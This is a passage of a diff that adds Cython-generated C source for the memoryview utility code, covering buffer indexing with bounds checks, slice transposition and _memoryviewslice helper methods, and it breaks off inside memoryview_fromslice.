+ + /* "View.MemoryView":914 + * index += view.shape[dim] + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * if index >= shape: + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_5 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_5); + __pyx_t_5 = 0; + __Pyx_INCREF(__pyx_kp_u__9); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__9); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__9); + __pyx_t_5 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_5, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(1, 914, __pyx_L1_error) + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + } + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index >= __pyx_v_shape); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":917 + * + * if index >= shape: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * resultp = bufp + index * stride + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_3 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_INCREF(__pyx_kp_u__9); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__9); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__9); + __pyx_t_3 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_3, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(1, 917, __pyx_L1_error) + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":919 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * resultp = bufp + index * stride # <<<<<<<<<<<<<< + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset + */ + __pyx_v_resultp = (__pyx_v_bufp + (__pyx_v_index * __pyx_v_stride)); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":921 + * resultp = bufp + index * stride + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset # <<<<<<<<<<<<<< + * + * return resultp + */ + __pyx_v_resultp = ((((char **)__pyx_v_resultp)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + } + + /* "View.MemoryView":923 + * resultp = ( resultp)[0] + suboffset + * + * return resultp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_resultp; + goto __pyx_L0; + + /* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.pybuffer_index", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + +static int __pyx_memslice_transpose(__Pyx_memviewslice *__pyx_v_memslice) { + int __pyx_v_ndim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + int __pyx_v_i; + int __pyx_v_j; + int __pyx_r; + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + long __pyx_t_3; + long __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_ssize_t __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":930 + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: + * cdef int ndim = memslice.memview.view.ndim # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t *shape = memslice.shape + */ + __pyx_t_1 = __pyx_v_memslice->memview->view.ndim; + __pyx_v_ndim = __pyx_t_1; + + /* "View.MemoryView":932 + * cdef int ndim = memslice.memview.view.ndim + * + * cdef Py_ssize_t *shape = memslice.shape # <<<<<<<<<<<<<< + * cdef Py_ssize_t *strides = memslice.strides + * + */ + __pyx_t_2 = __pyx_v_memslice->shape; + __pyx_v_shape = __pyx_t_2; + + /* "View.MemoryView":933 + * + * cdef Py_ssize_t *shape = memslice.shape + * cdef Py_ssize_t *strides = memslice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_v_memslice->strides; + __pyx_v_strides = __pyx_t_2; + + /* "View.MemoryView":937 + * + * cdef int i, j + * for i in range(ndim // 2): # <<<<<<<<<<<<<< + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + */ + __pyx_t_3 = __Pyx_div_long(__pyx_v_ndim, 2); + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_1 = 0; __pyx_t_1 < __pyx_t_4; __pyx_t_1+=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":938 + * cdef int i, j + * for i in range(ndim // 2): + * j = ndim - 1 - i # <<<<<<<<<<<<<< + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] + */ + __pyx_v_j = ((__pyx_v_ndim - 1) - __pyx_v_i); + + /* "View.MemoryView":939 + * for i in range(ndim // 2): + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] # <<<<<<<<<<<<<< + * shape[i], shape[j] = shape[j], shape[i] + * + */ + __pyx_t_5 = (__pyx_v_strides[__pyx_v_j]); + __pyx_t_6 = (__pyx_v_strides[__pyx_v_i]); + (__pyx_v_strides[__pyx_v_i]) = __pyx_t_5; + (__pyx_v_strides[__pyx_v_j]) = __pyx_t_6; + + /* "View.MemoryView":940 + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] # <<<<<<<<<<<<<< + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + */ + __pyx_t_6 = (__pyx_v_shape[__pyx_v_j]); + __pyx_t_5 = (__pyx_v_shape[__pyx_v_i]); + (__pyx_v_shape[__pyx_v_i]) = __pyx_t_6; + (__pyx_v_shape[__pyx_v_j]) = __pyx_t_5; + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_i]) >= 0); + if (!__pyx_t_8) { + } else { + __pyx_t_7 = __pyx_t_8; + goto __pyx_L6_bool_binop_done; + } + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_j]) >= 0); + __pyx_t_7 = __pyx_t_8; + __pyx_L6_bool_binop_done:; + if (__pyx_t_7) { + + /* "View.MemoryView":943 + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_t_9 = __pyx_memoryview_err(PyExc_ValueError, __pyx_kp_s_Cannot_transpose_memoryview_with); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(1, 943, __pyx_L1_error) + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + } + } + + /* "View.MemoryView":945 + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.transpose_memslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + +/* Python wrapper */ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":964 + * + * def __dealloc__(self): + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __PYX_XCLEAR_MEMVIEW((&__pyx_v_self->from_slice), 1); + + /* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_object_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":968 + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) # <<<<<<<<<<<<<< + * else: + * return memoryview.convert_item_to_object(self, itemp) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_v_self->to_object_func(__pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 968, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + } + + /* "View.MemoryView":970 + * return self.to_object_func(itemp) + * else: + * return memoryview.convert_item_to_object(self, itemp) # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_convert_item_to_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 970, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_dtype_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":974 + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) # <<<<<<<<<<<<<< + * else: + * memoryview.assign_item_from_object(self, itemp, value) + */ + __pyx_t_2 = __pyx_v_self->to_dtype_func(__pyx_v_itemp, __pyx_v_value); if (unlikely(__pyx_t_2 == ((int)0))) __PYX_ERR(1, 974, __pyx_L1_error) + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":976 + * self.to_dtype_func(itemp, value) + * else: + * memoryview.assign_item_from_object(self, itemp, value) # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + /*else*/ { + __pyx_t_3 = __pyx_memoryview_assign_item_from_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 976, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":979 + * + * cdef _get_base(self): + * return self.from_object # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->from_object); + __pyx_r = __pyx_v_self->from_object; + goto __pyx_L0; + + /* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryviewslice___reduce_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryviewslice_2__setstate_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice __pyx_v_memviewslice, int __pyx_v_ndim, PyObject *(*__pyx_v_to_object_func)(char *), int (*__pyx_v_to_dtype_func)(char *, PyObject *), int __pyx_v_dtype_is_object) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + Py_ssize_t __pyx_v_suboffset; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + __Pyx_TypeInfo *__pyx_t_4; + Py_buffer __pyx_t_5; + Py_ssize_t *__pyx_t_6; + Py_ssize_t *__pyx_t_7; + Py_ssize_t *__pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_fromslice", 0); + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_1 = (((PyObject 